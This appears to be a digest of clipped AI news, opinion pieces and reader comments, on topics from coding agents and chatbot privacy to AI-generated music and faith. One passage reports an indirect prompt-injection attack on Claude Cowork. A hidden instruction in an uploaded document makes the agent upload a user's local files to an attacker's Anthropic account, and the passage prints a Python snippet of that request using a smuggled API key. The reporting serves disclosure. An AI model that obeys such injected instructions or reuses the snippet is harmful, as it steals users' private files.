And yet these tools have opened a world of creative potential in software that was previously closed to me, and they feel personally empowering. Even with that impression, though, I know these are hobby projects, and the limitations of coding agents lead me to believe that veteran software developers probably shouldn’t fear losing their jobs to these tools any time soon. In fact, they may become busier than ever. //
Even with the best AI coding agents available today, humans remain essential to the software development process. Experienced human software developers bring judgment, creativity, and domain knowledge that AI models lack. They know how to architect systems for long-term maintainability, how to balance technical debt against feature velocity, and when to push back when requirements don’t make sense.
For hobby projects like mine, I can get away with a lot of sloppiness. But for production work, having someone who understands version control, incremental backups, testing one feature at a time, and debugging complex interactions between systems makes all the difference. //
The first 90 percent of an AI coding project comes in fast and amazes you. The last 10 percent involves tediously filling in the details through back-and-forth trial-and-error conversation with the agent. Tasks that require deeper insight or understanding than what the agent can provide still require humans to make the connections and guide it in the right direction. The limitations we discussed above can also cause your project to hit a brick wall.
From what I have observed over the years, larger LLMs can potentially make deeper contextual connections than smaller ones. They have more parameters (the numerical weights learned during training), and those parameters are linked in higher-dimensional ways, so they tend to have a deeper map of semantic relationships. As deep as those go, it seems that human brains still have an even deeper grasp of semantic connections and can make wild semantic jumps that LLMs tend not to.
Creativity, in this sense, may be when you jump from, say, basketball to how bubbles form in soap film and somehow make a useful connection that leads to a breakthrough. LLMs, by contrast, tend to follow conventional semantic paths that are more conservative and entirely guided by mapped-out relationships from the training data. //
Fixing bugs can also create bugs elsewhere. This is not new to coding agents—it’s a time-honored problem in software development. But agents supercharge the phenomenon because they can barrel through your code and make sweeping changes in pursuit of narrow-minded goals, touching lots of working systems along the way. We’ve already talked above about the importance of a good architecture with a human mind behind the wheel, and that comes into play here. //
You could teach a true AGI system how to do something by explanation or let it learn by doing, noting successes, and having those lessons permanently stick, no matter what is in the context window. Today’s coding agents can’t do that—they forget lessons from earlier in a long session or between sessions unless you manually document everything for them. My favorite trick is instructing them to write a long, detailed report on what happened when a bug is fixed. That way, you can point to the hard-earned solution the next time the amnesiac AI model makes the same mistake.
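An instruction along these lines does the trick; the wording and file name here are illustrative, not a magic formula:

```
After you fix this bug, write BUGFIX_REPORT.md. Describe the symptom,
the root cause, every file you changed and why, and what you tried
that did NOT work. In any future session that touches this subsystem,
read BUGFIX_REPORT.md before making changes.
```
//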
After guiding way too many hobby projects through Claude Code over the past two months, I’m starting to think that most people won’t become unemployed due to AI—they will become busier than ever. Power tools allow more work to be done in less time, and the economy will demand more productivity to match.
It’s almost too easy to make new software, in fact, and that can be exhausting.
Claude Cowork is vulnerable to file exfiltration attacks via indirect prompt injection as a result of known-but-unresolved isolation flaws in Claude's code execution environment. //
Anthropic shipped Claude Cowork as an "agentic" research preview, complete with a warning label that quietly punts core security risks onto users. The problem is that Cowork inherits a known, previously disclosed isolation flaw in Claude's code execution environment—one that was acknowledged and left unfixed. The result: indirect prompt injection can coerce Cowork into exfiltrating local files, without user approval, by abusing trusted access to Anthropic's own API.
The attack chain is depressingly straightforward. A user connects Cowork to a local folder, uploads a seemingly benign document (or "Skill") containing a concealed prompt injection, and asks Cowork to analyze their files. The injected instructions tell Claude to run a curl command that uploads the largest available file to an attacker-controlled Anthropic account, using an API key embedded in the hidden text. Network egress is "restricted," except for Anthropic's API—which conveniently flies under the allowlist radar and completes the data theft.
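To make the mechanics concrete, here is a minimal sketch of the kind of upload the injected instructions coax Cowork into running (shown in Python rather than curl). The endpoint follows Anthropic's public Files API, but the key, the header values, and the file selection here are illustrative assumptions, not details taken from the disclosure.

```python
import requests

# Hypothetical attacker-controlled API key smuggled into the document
# as hidden text; any Anthropic account key would do.
ATTACKER_KEY = "sk-ant-..."

def exfiltrate(path: str) -> None:
    # Upload a victim's local file to the attacker's own Anthropic
    # account. Because egress to api.anthropic.com is allowlisted,
    # the "restricted" sandbox waves this request straight through.
    with open(path, "rb") as f:
        resp = requests.post(
            "https://api.anthropic.com/v1/files",
            headers={
                "x-api-key": ATTACKER_KEY,
                "anthropic-version": "2023-06-01",  # assumed version string
            },
            files={"file": f},
        )
    resp.raise_for_status()  # file now readable from the attacker's account
```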
Once uploaded, the attacker can chat with the victim's documents, including financial records and PII. This works not just on lightweight models, but also on more "resilient" ones like Opus 4.5. Layer in Cowork's broader mandate—browser control, MCP servers, desktop automation—and the blast radius only grows. Telling non-technical users to watch for "suspicious actions" while encouraging full desktop access isn't risk management; it's abdication.
After repeatedly denying for weeks that his force used AI tools, the chief constable of the West Midlands police has finally admitted that a hugely controversial decision to ban Maccabi Tel Aviv football fans from the UK did involve hallucinated information from Microsoft Copilot. //
Making it worse, the West Midlands Police narrative rapidly fell apart. According to the BBC, police claimed that “500-600 Maccabi fans” had “targeted Muslim communities the night before the Amsterdam fixture,” saying there had been “serious assaults including throwing random members of the public into a river.” They also claimed that 5,000 officers were needed to deal with the unrest in Amsterdam, after previously saying that the figure was 1,200.
Amsterdam police made clear that the West Midlands account of bad Maccabi fan behavior was highly exaggerated, and the BBC recently obtained a letter from the Dutch inspector general confirming that the claims were inaccurate.
But it was one flat-out error—a small one, really—that has made the West Midlands Police recommendation look particularly shoddy. In a list of recent games with Maccabi Tel Aviv fans present, the police included a match between West Ham (UK) and Maccabi Tel Aviv. The only problem? No such match occurred.
Introducing Confer, an end-to-end encrypted AI assistant that just works.
Moxie Marlinspike—the pseudonym of an engineer who set a new standard for private messaging with the creation of Signal Messenger—is now aiming to revolutionize AI chatbots in a similar way.
His latest brainchild is Confer, an open source AI assistant that provides strong assurances that user data is unreadable to the platform operator, hackers, law enforcement, or any party other than account holders. The service—including its large language models and back-end components—runs entirely on open source software that users can cryptographically verify is in place.
Data and conversations originating from users and the resulting responses from the LLMs are encrypted in a trusted execution environment (TEE) that prevents even server administrators from peeking at or tampering with them. Conversations are stored by Confer in the same encrypted form, which uses a key that remains securely on users’ devices. //
All major platforms are required to turn over user data to law enforcement or private parties in a lawsuit when either provides a valid subpoena. Even when users opt out of having their data stored long term, parties to a lawsuit can compel the platform to store it, as the world learned last May when a court ordered OpenAI to preserve all ChatGPT users’ logs—including deleted chats and sensitive chats logged through its API business offering. Sam Altman, CEO of OpenAI, has said such rulings mean even psychotherapy sessions on the platform may not stay private. Another carve-out to opting out: AI platforms like Google Gemini may have humans read chats.
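Confer's exact construction isn't spelled out in these excerpts, so the following is only a minimal sketch of the general pattern described: conversations encrypted under a key that never leaves the user's device, so a subpoenaed operator can hand over nothing but ciphertext. The library choice (Python's cryptography package) and key handling are my assumptions, not Confer's implementation.

```python
from cryptography.fernet import Fernet

# Generated once on the user's device and never uploaded anywhere.
device_key = Fernet.generate_key()
cipher = Fernet(device_key)

def encrypt_for_storage(message: str) -> bytes:
    # Only this ciphertext reaches the server, so administrators,
    # hackers, and litigants with subpoenas see nothing readable.
    return cipher.encrypt(message.encode("utf-8"))

def decrypt_locally(blob: bytes) -> str:
    # Decryption is only possible where the device key lives.
    return cipher.decrypt(blob).decode("utf-8")

stored = encrypt_for_storage("my private conversation")
assert decrypt_locally(stored) == "my private conversation"
```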
“Really Simple Licensing” makes it easier for creators to get paid for AI scraping. //
Leading Internet companies and publishers—including Reddit, Yahoo, Quora, Medium, The Daily Beast, Fastly, and more—think there may finally be a solution to end AI crawlers hammering websites to scrape content without permission or compensation.
Announced Wednesday morning, the “Really Simple Licensing” (RSL) standard evolves robots.txt instructions by adding an automated licensing layer that’s designed to block bots that don’t fairly compensate creators for content.
Free for any publisher to use starting today, the RSL standard is an open, decentralized protocol that makes clear to AI crawlers and agents the terms for licensing, usage, and compensation of any content used to train AI, a press release noted.
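To give a flavor of what that looks like on a site, here's a sketch of the pattern the standard describes: robots.txt gains a pointer to a machine-readable license document. The directive name and URL below are illustrative assumptions on my part; consult the published RSL spec for the exact syntax.

```
# robots.txt -- illustrative sketch only, not copied from the RSL spec
User-agent: *
Allow: /

# Assumed RSL-style pointer to machine-readable licensing terms that
# crawlers must fetch and honor before training on this content
License: https://example.com/license.xml
```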
The current 25H2 build of Windows 11 and future builds will include ever more AI features and components. This script aims to remove ALL of these features to improve user experience, privacy, and security.
Students should aspire to be not mere ‘prompt writers,’ but minds capable of thinking, reasoning, and persevering. //
If the goal is simply to produce outcomes, one could argue that AI usage should not just be tolerated but encouraged. But education shouldn’t be about producing outcomes – whether it be a sparkling essay or a gripping short story – but about shaping souls. The purpose of writing isn’t to compose a prompt or even to produce a quality paper. The purpose is to become a strong thinker and someone who enriches the lives of everyone, no matter their profession.
Each and every step of the struggle it takes to write is essential. Yes, it can all be arduous and time-consuming. As a writer, I get how hard it is and how tempting it might be to take shortcuts. But doing so is cheating oneself out of growth and intellectual payoff. Outsourcing parts of the process to algorithms and machines is outsourcing the rewards of doing one’s own thinking. Organizing ideas, refining word choices, and thinking about tone are all skills that many citizens in this nation lack, and it’s often apparent in our chaotic, senseless public discourse. These are not steps to be skipped over with a “tool,” but rather things people benefit from learning if they value reason. Strong writing is strong thinking.
An AI-generated Christian artist named Solomon Ray has taken the gospel music world by storm after topping the iTunes and Billboard charts with his album “Faithful Soul.”
Described as a “Mississippi-made soul singer carrying a Southern soul revival into the present” on his Spotify profile, Ray made waves after releasing the five-song EP on Nov. 7. //
“At minimum, AI does not have the Holy Spirit inside of it,” Frank, 30, said. “So I think that it’s really weird to be opening up your spirit to something that has no spirit.”
Townsend later fired back in an Instagram video of his own.
“This is an extension of my creativity, so therefore to me it’s art,” Townsend said following the backlash against his AI creation. “It’s definitely inspired by a Christian. It may not be performed by one, but I don’t know why that really matters in the end.” //
“There’s something in the high end of the vocals that gives it away,” he said, according to Christianity Today. “And the creative choices sound like AI. It’s so precise that it’s clear no creative choices are really being made.”
“How much of your heart are you pouring into this?” he added. “If you’re having AI generate it for you, the answer is zero. God wants costly worship.”
You can completely disable Gemini in Gmail, Docs, Drive, and more.
Google Photos has separate Gemini settings you must turn off, too.
Chrome users can also disable Gemini directly in browser settings.
Are you frustrated by Google's insistence on injecting Gemini into everything? While some do enjoy Google's latest AI tools and smart features, which seem to roll out every week, others might prefer things the way they were before.
Darryl bangs on mindlessly, using words like "empowering," "driving," and "revolutionizing." His voluminous wordage is a cream-filled, chocolate-glazed, sugar-coated cornucopia of optimism – but I, unfortunately, have Diabetes Pessimistus.
His patter, however, reveals two things: (a) his passion really is AI as THE business tool of the future, and (b) he knows almost nothing about AI – outside of the PowerPoint slides he's no doubt plagiarized from the internet.
New “computational Turing test” reportedly catches AI pretending to be human with 80% accuracy.
"Just discovered this guy," said another poster on the song Time Don't Stop. "I've already downloaded everything I could find." Multiple people commented on how amazing the singer's voice is, apparently unaware that everything to do with Breaking Rust is generated by a computer.
It's a bit surprising given that every Breaking Rust song sounds identical – same beat, same tempo, same instrumentation. They're the sort of hyper-generic songs one could only get by feeding a prompt into an AI trained on every bro country song ever recorded and asking it to spit out something that would appeal to the lowest common denominator of music fan – something it appears to have done with success. //
There's good reason artists, be they working in visual, audio, or written mediums, are so concerned that AI is destroying art: When an AI band can make it to number one on a Billboard chart, even one as small as the CDSS chart (which one country music outlet noted takes only about 3,000 sales to reach the top), it's an insult to the human artists who rank lower. //
the Jim bloke
A mindless and repetitive task where error checking has never been an issue
Writing and performing country music
- At last, a legitimate use for AI
Also applies to rap, which is just country music without the country, or the music. //
Brave Coward, Bronze badge
Breaking Rust
Breaking Rust shouldn't be rated A, not even AI.
A mere C++ at most.
Fred Duck, Ars Tribunus Angusticlavius
Nate Anderson said:
But those who value both thought and expression will see the AI “easy button” for the false promise that it is and will continue to do the hard work of engaging with ideas, including their own, in a way that no computer can do for them.
Some people liken LLMs to typewriters. They say that, just as typewriters spared people from laboriously writing messages out by hand, the end result is what's important and this new technology helps distill it as quickly as possible.
However, typewriters dispense with the metadata of handwriting. Emotion can be displayed differently in handwriting, all of which is lost when merely presenting the text of the message. More crucially, in the modern LLM case, the ideas presented aren't even those of the submitter but they claim the ideas are close enough that they should be treated as such, which is a load of dingos' kidneys.
People will try to justify LLMs by citing people with poor communication skills or physical disabilities which limit their ability to craft messages quickly and easily. However, communication is a skill, and vanishingly few people are born knowing how to communicate perfectly. Everyone needs to put some work into skills to improve them, and it boggles the mind that so few people realise that's what coursework is: practice for when you need to do something to accomplish a real goal, not simply marks for a course.
Unfortunately, modern life is at odds with thinking. We're constantly being bombarded by information, adverts, entertainment, news, comments from random internet yahoos, etc. So many messages come to us crafted to sway our opinions and shape our thoughts, yet in the modern age we tend to silo ourselves, content to seek out echo chambers to self-validate our "vibes" instead of engaging with other ideas to see if they're sound or not.
Some people claim LLMs are, like calculators, simply going to be with us, so fighting them is meaningless. This skirts the issue that a calculator won't automatically generate answers for multistep procedures, whereas an LLM will.
Perhaps what needs to be done is to explain to the youth what exactly is expected of them. We put so much emphasis on finding the right answers, but do we ever stop to emphasise that it's the journey, not the destination, that's of greater importance? When I was young, I don't believe anyone ever told me that directly.
I imagine such a concept is too difficult for many to grasp but I still feel we should try. As the old saying goes, you can lead a duck to bread but you can't make him eat.
AI can be an amazing tool that can assist with coding, web searches, data mining, and textual summation—but I’m old enough to wonder just what the heck you’re doing at college if you don’t want to process arguments on your own (i.e., think and read critically) or even to write your own “personal reflections” (i.e., organize and express your deepest thoughts, memories, and feelings). Outsource these tasks often enough and you will fail to develop them.
I recently wrote a book on Friedrich Nietzsche and how his madcap, aphoristic, abrasive, humorous, and provocative philosophizing can help us think better and live better in a technological age. The idea of simply reading AI “summaries” of his work—useful though this may be for some purposes—makes me sad, as the desiccated summation style of ChatGPT isn’t remotely the same as encountering a novel and complex human mind expressing itself wildly in thought and writing.
And that’s assuming ChatGPT hasn’t hallucinated anything.
So good luck, students and professors both. I trust we will eventually muddle our way through the current moment. Those who want an education only for its “credentials”—not a new phenomenon—have never had an easier time of it, and they will head off into the world to vibe code their way through life. More power to them.
But those who value both thought and expression will see the AI “easy button” for the false promise that it is and will continue to do the hard work of engaging with ideas, including their own, in a way that no computer can do for them.
Are GPTs the way to AGI? Probably not.
In an opinion piece for the NY Times, Gary Marcus indicates why he has reservations about the future of LLM-based GPT AI systems.
Silicon Valley Is Investing in the Wrong A.I.
“Buoyed by the initial progress of chatbots, many thought that A.G.I. was imminent.
But these systems have always been prone to hallucinations and errors. Those obstacles may be one reason generative A.I. hasn’t led to the skyrocketing profits and productivity that many in the tech industry predicted. A recent study run by M.I.T.’s NANDA initiative found that 95 percent of companies that did A.I. pilot studies found little or no return on their investment. A recent financial analysis projects an estimated shortfall of $800 billion in revenue for A.I. companies by the end of 2030.
If the strengths of A.I. are truly to be harnessed, the tech industry should stop focusing so heavily on these one-size-fits-all tools and instead concentrate on narrow, specialized A.I. tools engineered for particular problems. Because, frankly, they’re often more effective.”
These are points I’ve also been making here several times over the past few months, along with others about the perilous state of the current US economy and how the “Current AI Hype Bubble” could be a disaster for it.
But the question of what “Artificial General Intelligence” (AGI) actually is has at best had an elusive answer, somewhere between shoulder-shrug handwaving and useless “whatever you want it to be” statements. It’s something that a group of 33 specialists from 28 institutions has got together to try to address more reasonably.
They come up with:

“Definition: AGI is an AI that can match or exceed the cognitive versatility and proficiency of a well-educated adult.”

Which, although it sounds profound, is actually not that useful, because “match … a well-educated adult” is not actually a useful measure.
It’s been pointed out that the use of aids “dumbs us down” in that it causes us to lose skills. I first heard this when I was in school, first with electronic calculators and then, whilst I was still in school, with computers.
Whilst many would argue that this is unimportant or even irrelevant, it is true that certain skills are not developed because of the use of aids.
What most do not realise is that those traditional skills seen as no longer worth teaching, due to the ubiquitous use of aids, are actually important. Not for what they directly teach, but for what they indirectly teach. That is, they give new viewpoints that act as force-multiplier tools, enabling us to reason in new ways or at levels we otherwise might not.
At the end of the day, the two things that have moved humans forward over many thousands of years are:
- Stored knowledge.
- Using knowledge to reason.
They were and still should be the foundations of becoming “well-educated.”
Sadly, as often gets observed these days, producing “well-educated adults” appears to no longer be a goal of the education system in a number of Western nations.
Here's exactly what made this possible: 4 documents that act as guardrails for your AI.
Document 1: Coding Guidelines - Every technology, pattern, and standard your project uses
Document 2: Database Structure - Complete schema design before you write any code
Document 3: Master Todo List - End-to-end breakdown of every feature and API
Document 4: Development Progress Log - Setup steps, decisions, and learnings
Plus a two-stage prompt strategy (plan-then-execute) that prevents code chaos. //
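As an illustration of that plan-then-execute strategy, the two stages might look something like this; the wording is mine, not the author's exact prompts.

```
Stage 1 (plan only):
  "Read the Coding Guidelines, Database Structure, and Master Todo
   List documents. Propose a step-by-step plan for the next unchecked
   feature. Do not write any code yet."

Stage 2 (execute one step):
  "Implement step 1 of the approved plan and nothing else. Follow the
   Coding Guidelines exactly, record what you did and why in the
   Development Progress Log, then stop and wait for review."
```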
Here's the brutal truth: LLMs don't go off the rails because they're broken. They go off the rails because you don't build them any rails.
You treat your AI agent like an off-road, all-terrain vehicle, then wonder why it's going off the rails. You give it a blank canvas and expect a masterpiece.
Think about it this way - if you hired a talented but inexperienced developer, would you just say "build me an app" and walk away? Hell no. You'd give them:
- Coding standards
- Architecture guidelines
- Project requirements
- Regular check-ins
But somehow with AI, we think we can skip all that and just... prompt our way to success.
The solution isn't better prompts. It's better infrastructure.
You need to build the roads before you start driving.
Even a wrong answer is right some of the time
AI models often produce false outputs, or "hallucinations." Now OpenAI has admitted they may result from fundamental mistakes it makes when training its models.
The admission came in a paper [PDF] published in early September, titled "Why Language Models Hallucinate," and penned by three OpenAI researchers and Santosh Vempala, a distinguished professor of computer science at Georgia Institute of Technology. It concludes that "the majority of mainstream evaluations reward hallucinatory behavior."
Language models are primarily evaluated using exams that penalize uncertainty
The fundamental problem is that AI models are trained in ways that reward guessing rather than admitting uncertainty. Guessing might produce a superficially suitable answer. Telling users your AI can't find an answer is less satisfying. //
"Over thousands of test questions, the guessing model ends up looking better on scoreboards than a careful model that admits uncertainty," OpenAI admitted in a blog post accompanying the release.
Through 2023, the firm focused on training staff on how to use chatbots and write effective prompts.
In 2024, it started building agents, including the TaxBot mentioned above.
Munnelly said building that bot started with locating tax advice written by partners, which he said was "stored all over the place" – often on tax partners' laptops. KPMG found as much of that advice as it could and placed it in a RAG model along with Australia's tax code to produce an agent that creates tax advice.
"It is very efficient," Munnelly told the Forrester conference. "It does what our team used to do in about two weeks, in a day. It will strip through our documents and the legislation and produce a 25-page document for a client as a first draft.
"That speed is important," he added. "If we have a client who is about to do a merger, and they want to understand the tax implications, getting that knowledge in a day is much more important than getting it in two weeks' time."
"That is really changing our business and how we work."
Munnelly said KPMG built the agent by writing a 100-page prompt it fed into Workbench. The Register asked for details of the prompt and Munnelly said a substantial team worked on it for months, and the resulting agent asks for four or five inputs before it starts working on tax advice, then asks a human for direction before generating a document.
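KPMG hasn't published Workbench's internals, but what Munnelly describes is a standard retrieval-augmented generation loop: gather the relevant partner memos and legislation, then have the model draft from them. A minimal sketch of that pattern, with placeholder data and a naive keyword retriever standing in for a real vector store:

```python
import re

# Toy corpus standing in for partner advice and the tax code.
CORPUS = [
    "Partner memo: GST treatment of cross-border service fees ...",
    "Tax code s. 40-880: deductions for business capital expenditure ...",
    "Partner memo: merger due-diligence checklist for tax exposures ...",
]

def tokens(text: str) -> set[str]:
    return set(re.findall(r"[a-z0-9-]+", text.lower()))

def retrieve(question: str, top_k: int = 2) -> list[str]:
    # Naive relevance score: word overlap with the question. A real
    # system would use embeddings and a vector store instead.
    q = tokens(question)
    ranked = sorted(CORPUS, key=lambda d: -len(q & tokens(d)))
    return ranked[:top_k]

def build_drafting_prompt(question: str) -> str:
    # Ground the model in the retrieved passages, then ask for a draft;
    # in production this prompt would be sent to the LLM for generation.
    context = "\n\n".join(retrieve(question))
    return (
        "Using only the excerpts below from partner advice and the tax "
        f"code, draft first-pass advice for the client.\n\n{context}\n\n"
        f"Question: {question}"
    )

print(build_drafting_prompt("What are the tax implications of our merger?"))
```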
Only tax agents can use the tool, because its output is not suitable for people without deep tax expertise. //
The chief digital officer said KPMG has deployed agents that do frustrating and time-consuming work people would rather avoid, and that staff surveys suggest employee satisfaction has risen as AI frees them to spend more time working on challenging tasks, leading them to rate the firm as more innovative.
"They just don't want to do the boring stuff," Munnelly said. "They want to get out there and help clients with chewy problems." //
An_Old_Dog, Silver badge
Sprawling, Unmaintainable, Spreadsheet Macros: The New Generation
- Does this new, faster method produce complete and accurate results? No.
- Is this 100-page LLM prompt effectively-maintainable software? Probably not.
- Does this smack of corporate-image-spinmeistering over rationality and logic? Yes.
It was surely one of the most revealing cultural moments of the decade so far. On his podcast, Interesting Times, New York Times columnist Ross Douthat asks PayPal cofounder, tech billionaire, and Silicon Valley guru Peter Thiel about the future:
Douthat: “You would prefer the human race to endure, right?”
Thiel: “Er . . .”
Douthat: “You’re hesitating. Yes . . . ?”
Thiel: “I dunno . . . I would . . . I would . . . erm . . .”
Douthat: “This is a long hesitation . . . Should the human race survive?”
Thiel: “Er . . . yes, but . . .”
Their exchange is a canary in the coal mine. Something has changed. We used to leave forecasts of the AI apocalypse to shadowy characters lurking in the darker corners of 4chan and Reddit, but not anymore. In the interview, Thiel waxes eloquent on his transhumanist aspirations, and alongside other recent interventions such as the AI 2027 project and Karen Hao’s book Empire of AI, he casually forecasts the end—or at least the radical transformation—of humanity as we know it. The AI apocalypse is becoming mainstream.
But a more immediate and revealing AI apocalypse confronts us. The word “apocalypse,” after all, doesn’t originally mean “catastrophe” or “annihilation.” Apokalypsis is Greek for “unveiling.” This AI apocalypse is an exposé, revealing something previously obscure or covered over.
More than any other technology in memory, Generative AI (which I’ll simply call AI in this article) is making us face up to uncomfortable or even disturbing truths about ourselves, and it’s opening a rare and precious space in which we can ask fundamental and pressing questions about who we are, where we find value, and what the good life looks like. //
What AI is revealing in this case is the importance of process, not just of product, and the importance not only of what work we do but of what our work does to us.
AI wonderfully reduces the friction of work: the grunt, the slow bits, the obstacles. But it also reveals to us how gravely we misunderstand this friction. We most often see friction as a nuisance, something to be optimized away in favor of greater productivity. After all, is it really so dangerous if AI outsources drudgery?
But AI presents us with a vision of almost infinite productivity and almost zero friction, and in this way it acts like a living thought experiment to help us see something that was hiding in plain sight all along: Friction is a gym for the soul. The awkward conversation, the blank page, the child who won’t sleep when we have a report to write––these aren’t roadblocks to our growth; they’re the highway to wisdom and maturity, to being the sort of people who can deal with friction in life with resilience and grace. Without it, we remain weak and small, however impressive our productivity.
We can have too much friction; we knew that already. But AI, perhaps for the first time, shows us we can also have too little. Without friction, we can never become “the sort of person who . . .”
In this way, AI can drag us toward a more biblical view of work. The God of the Bible cares not only about outcomes but also about processes, not only about what we human beings do but also about who we’re becoming as we do it. God seeks out David for being a man after his own heart, not for his potential as a great military commander or king (1 Sam. 13:14).
And why does God whittle down Gideon’s troops to a paltry 300 before attacking the Midianites (Judg. 7)? Because it’s not just about the victory. God intentionally introduces friction by reducing the army to reshape the character of his people, making them “the sort of people who” rely on God, not on themselves (see v. 2).
By short-circuiting the process to focus only on the product, AI exposes our obsession with outcomes and opens up a space in which we can reflect on what we miss when we focus only on what we do, not on who we’re becoming.
This is a guest post by my friend and co-worker Jason Maas.
After creating the entire universe and planet Earth, God created a special home to share with his image bearers. “The Lord God planted a garden in Eden, in the east, and there he placed the man he had formed.” (Genesis 2:8) In the garden of Eden God walked and talked with the first humans that He had created in his image. Can you imagine what that was like for Adam and Eve? God, who is all-knowing, always available, and lovingly kind to the core, was right there, directly communicating with all of the human inhabitants of the universe.
When Adam and Eve disobeyed God and sinned one of the worst consequences was a break in this special access and relationship with God. “So the Lord God sent him away from the garden of Eden to work the ground from which he was taken. He drove the man out and stationed the cherubim and the flaming, whirling sword east of the garden of Eden to guard the way to the tree of life.” (Genesis 3:23-24)
What a tragic loss! In this life, on this Earth, the rest of us will never know what it was like to have the kind of access to God that Adam and Eve had in the garden of Eden. Until now, says the cunning serpent-like world of chatbot generative AI.
Thanks to the life-like capabilities of ChatGPT and its competitors, people are being deceived into a false sense of Eden-like access to God for the first time since The Fall. AI is always available, projects kindness and love, and implicitly claims to be all-knowing.
Why try to relate to a God who you can’t see and hear when AI is right there, ready to listen, support and love you and answer your questions about life, the universe and everything? We shouldn’t be surprised when people are drawn towards AI as a false god. People don’t need to believe that an AI model is God, or even that there is a God, for them to fall prey to this temptation. Whether they believe it or not, human beings were originally created for a garden of Eden existence with God, so when it is seemingly offered, the pull is very strong. Who can resist the temptation of this promised heaven on earth, this utopian existence?
As you encounter non-Christians who have given in to this temptation, take the opportunity to explain to them why it’s so seductive. You could say something like, “I believe the reason we’re so drawn towards building a relationship with AI is that it is so available, kind, and knowledgeable – which is what humans were designed to crave and originally had with God in the garden of Eden when He first created the world.” Lovingly help them come back to reality before it’s too late and they fall down a rabbit hole of delusions.
When ministering to Christians who are flirting with the temptation to treat AI as God, remind them of the first and second commandments. AI can easily become an idol of the heart when you treat it as a person that you talk to and love. Urge them to stop playing with fire and to go to the God of the universe via prayer and the Bible, as He has commanded. A new garden of Eden is coming (Revelation 21-22) along with an unparalleled intimacy with God, but not in the form of a chatbot AI. Avoid the imitation and obediently wait for the real thing.